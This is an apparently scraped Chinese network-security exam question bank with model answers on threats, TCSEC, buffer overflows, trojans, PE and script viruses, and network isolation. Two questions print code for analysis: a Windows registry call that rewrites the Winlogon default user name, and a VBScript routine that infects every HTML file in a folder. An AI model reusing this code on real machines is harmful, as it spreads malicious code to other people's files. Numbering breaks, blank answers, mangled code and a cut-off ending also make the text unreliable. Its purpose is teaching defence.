網(wǎng)絡(luò)安全考試簡答題

1、《網(wǎng)絡(luò)安全技術(shù)》考試題庫181.計算機網(wǎng)絡(luò)安全所面臨的威脅分為哪幾類？從人的角度，威脅網(wǎng)絡(luò)安全的因素有哪些？（P2）答：計算機網(wǎng)絡(luò)安全所面臨的威脅主要可分為兩大類：一是對網(wǎng)絡(luò)中信息的威脅，二是對網(wǎng)絡(luò)中設(shè)備的威脅(2分)。從人的因素考慮，影響網(wǎng)絡(luò)安全的因素包括：（1）人為的無意失誤。(1分)（2）人為的惡意攻擊。一種是主動攻擊，另一種是被動攻擊。(1分)（3）網(wǎng)絡(luò)軟件的漏洞和“后門”。(1分)2網(wǎng)絡(luò)攻擊和防御分別包括哪些內(nèi)容？(我們學的是

2、遠程攻擊與防御P33)答:網(wǎng)絡(luò)攻擊：網(wǎng)絡(luò)掃描、監(jiān)聽、入侵、后門、隱身；網(wǎng)絡(luò)防御：操作系統(tǒng)安全配置、加密技術(shù)、防火墻技術(shù)、入侵檢測技術(shù)。3網(wǎng)絡(luò)安全橘皮書是什么，包括哪些內(nèi)容？答：可信計算機評價準則TCSEC，4檔8級（P1718）4.分析TCPIP協(xié)議，說明各層可能受到的威脅及防御方法。(P219)答：網(wǎng)絡(luò)層：IP欺騙欺騙攻擊，保護措施：防火墻過濾、打補?。粋鬏攲樱簯?yīng)用層：郵件炸彈、病毒、木馬等，防御方法：認證、病毒掃描、安全教育等。5.

3、讀圖，說明網(wǎng)絡(luò)信息安全傳輸?shù)幕经h(huán)節(jié)和過程。答：圖示為源宿兩端的信息發(fā)送和接收過程。源文件進行信息摘要（HASH）》加密（私鑰）》連同原文再次加密（公鑰）》解密（私鑰）》摘要驗算等。6請分析網(wǎng)絡(luò)安全的層次體系。答：從層次體系上，可以將網(wǎng)絡(luò)安全分成四個層次上的安全：物理安全、邏輯安全、操作系統(tǒng)安全和聯(lián)網(wǎng)安全。7.請分析信息安全的層次體系。答：信息安全從總體上可以分成5個層次：安全的密碼算法，安全協(xié)議，網(wǎng)絡(luò)安全，系統(tǒng)安全以及應(yīng)用安全。9.基

4、于IPV4版本及TCPIP協(xié)議模型的安全模型，有哪些補?。▍f(xié)議）？答：IPSec、ISAKMP、MOSSPEMPGPSMIME、SHTTPSSHKerberos等。10.請說明“冰河”木馬的工作方式。答：病毒通過修改系統(tǒng)注冊表，通過執(zhí)行文本文件的雙擊打開操作，駐留病毒程序，伺機實現(xiàn)遠端控制目的。11.請分析以下代碼的作用和涵義。答：lRetCode=RegOpenKeyEx(HKEY_LOCAL_MACHINE“SOFTWAREMicr

5、osoftWindowsNTCurrentVersionWinlogon“0KEY_WRITE以寫方式打開注冊表，修改注冊表值，將“DefaultUserName“設(shè)置為“Hacker_sixage“1.簡述防范遠程攻擊的技術(shù)措施。(P31)答：防范遠程攻擊的主要技術(shù)措施有防火墻技術(shù)、數(shù)據(jù)加密技術(shù)和入侵檢測技術(shù)等。(2分)（1）防火墻技術(shù)。用來保護計算機網(wǎng)絡(luò)免受非授權(quán)人員的騷擾和黑客的入侵。(1分)（2）數(shù)據(jù)加密技術(shù)。數(shù)據(jù)加密技術(shù)已經(jīng)成

6、為所有通信安全的基石。(1分)（3）入侵檢測技術(shù)。是一種防范遠程攻擊的重要技術(shù)手段，能夠?qū)撛诘娜肭謩幼髯龀鲇涗?，并且能夠預(yù)測攻擊的后果。(1分)2.防范遠程攻擊的管理措施有那些？(P30)答：防范遠程攻擊的管理措施：(1)使用系統(tǒng)最高的安全級別。高安全等級的系統(tǒng)是防范遠程攻擊的首選。(2分)(2)加強內(nèi)部管理。為對付內(nèi)部產(chǎn)生的黑客行為，要在安全管理方面采取措施。(2分)(3)修補系統(tǒng)的漏洞。任何系統(tǒng)都是有漏洞的，應(yīng)當及時堵上已知的漏洞

7、并及時發(fā)現(xiàn)未知的漏洞。(1分)5.緩沖區(qū)溢出攻擊的原理是什么？答：緩沖區(qū)溢出攻擊指的是一種系統(tǒng)攻擊的手段，通過往程序的緩沖區(qū)寫超出其長度的內(nèi)容，造成緩沖區(qū)的溢出，從而破壞程序的堆棧，使程序轉(zhuǎn)而執(zhí)行其他指令，以達到攻擊的目的。(3分)緩沖區(qū)溢出攻擊最常見的方法是通過使某個特殊程序的緩沖區(qū)溢出轉(zhuǎn)而執(zhí)行一個Shell，通過Shell的權(quán)限可以執(zhí)行高級的命令。如果這個特殊程序具有System權(quán)限，攻擊成功者就能獲得一個具有Shell權(quán)限的She

8、ll，就可以對系統(tǒng)為所欲為了。(2分)6.簡述社會工程學攻擊的原理?！毒W(wǎng)絡(luò)安全技術(shù)》考試題庫387說明PE病毒的原理及影響問題。起源于DOS系統(tǒng)，發(fā)展于WINDOWS，通常采用匯編格式編寫，且格式為PE。具有數(shù)量極多、破壞性大和功能強等特點。其核心技術(shù)是感染模塊。8.簡述腳本病毒常用的自身隱藏方式。答：隨機選取密鑰對自己的部分代碼實施加密；采用變形技術(shù)；采用多態(tài)技術(shù)加殼。9.請說明如下代碼的類型和意義。向所有的擴展名為htmHTMhtm

9、lHTML的文件中寫代碼feachfileinFilesifUCase(right(file.name3))=“HTM“UCase(right(file.name4))=“HTML“thencurfile=curfolder&““&file.nameSetf=fso.OpenTextFile(curfileFAppendingTrue)f.Writevbcrlff.Write““&vbcrlff.Write“MsgBox““你中舊痛苦歲

10、月病毒了！“““&vbcrlff.Write“Setr=CreateObject(““W.Shell““)“&vbcrlff.Write“r.run(““notepad.exe““)“&vbcrlff.Write““endifnextf.Close答：腳本文件（惡意代碼）。文件被執(zhí)行時，將感染當前目錄下所有HTML文件。網(wǎng)頁打開時，會顯示一個對話框，同時打開記事本文件。10.簡述U盤病毒通常的幾種隱藏方式。答：作為系統(tǒng)文件隱藏；偽裝為其

11、他文件；隱藏在系統(tǒng)文件夾中；運用WINDOWS漏洞等。3.試述狀態(tài)機模型的開發(fā)步驟。答：一般構(gòu)造狀態(tài)機模型需要如下步驟：①定義狀態(tài)變量。定義與安全有關(guān)的狀態(tài)變量，主要是系統(tǒng)的主體、客體、安全屬性及主體對客體的訪問權(quán)等。(2分)②定義安全狀態(tài)。是根據(jù)系統(tǒng)的安全策略，抽象為安全性質(zhì)。(2分)③定義狀態(tài)轉(zhuǎn)換函數(shù)。定義狀態(tài)轉(zhuǎn)換函數(shù)或操作規(guī)則，定義安全操作執(zhí)行前后狀態(tài)變量的變化狀態(tài)。(2分)④證明轉(zhuǎn)換函數(shù)是否可保證安全狀態(tài)，要求每個轉(zhuǎn)換函數(shù)應(yīng)該達

12、到在如下要求，即某操作之前系統(tǒng)處于安全狀態(tài)，操作完成后，系統(tǒng)仍處于安全狀態(tài)。(2分)⑤定義并證明初始狀態(tài)。這一步在定義了系統(tǒng)的狀態(tài)變量后，為每一個狀態(tài)變量選擇一個初始值，并證明初始狀態(tài)是安全的。4.試述安全隔離技術(shù)并分析5代隔離技術(shù)的特點。答：“安全隔離技術(shù)”在確保有害攻擊隔離在可信網(wǎng)絡(luò)之外，并在保證可信網(wǎng)絡(luò)內(nèi)部信息不外泄的前題下，完成網(wǎng)絡(luò)間信息的安全交換。(2分)隔離產(chǎn)品發(fā)展至今共經(jīng)歷了5代：第1代隔離技術(shù)是完全的隔離，采用完全獨立的

13、設(shè)備、存儲和線路來訪問不同的網(wǎng)絡(luò)。(2分)第2代隔離技術(shù)是硬件卡隔離，通過硬作卡控制獨立存儲和分時共享設(shè)備與線路來實現(xiàn)對不同網(wǎng)絡(luò)的訪問。(2分)第3代隔離技術(shù)是數(shù)據(jù)轉(zhuǎn)播隔離，利用轉(zhuǎn)播系統(tǒng)分時復(fù)制文件的途徑來實現(xiàn)隔離。(2分)第4代隔離技術(shù)是空氣開關(guān)隔離，通過使用單刀雙擲開關(guān)，通過內(nèi)外部網(wǎng)絡(luò)分時訪問臨時緩存器來完成數(shù)據(jù)交換的。(1分)第5代隔離技術(shù)是安全通道隔離，通過專用通信硬件和專有交換協(xié)議等安全機制，來實現(xiàn)網(wǎng)絡(luò)間的隔離和數(shù)據(jù)交換。；(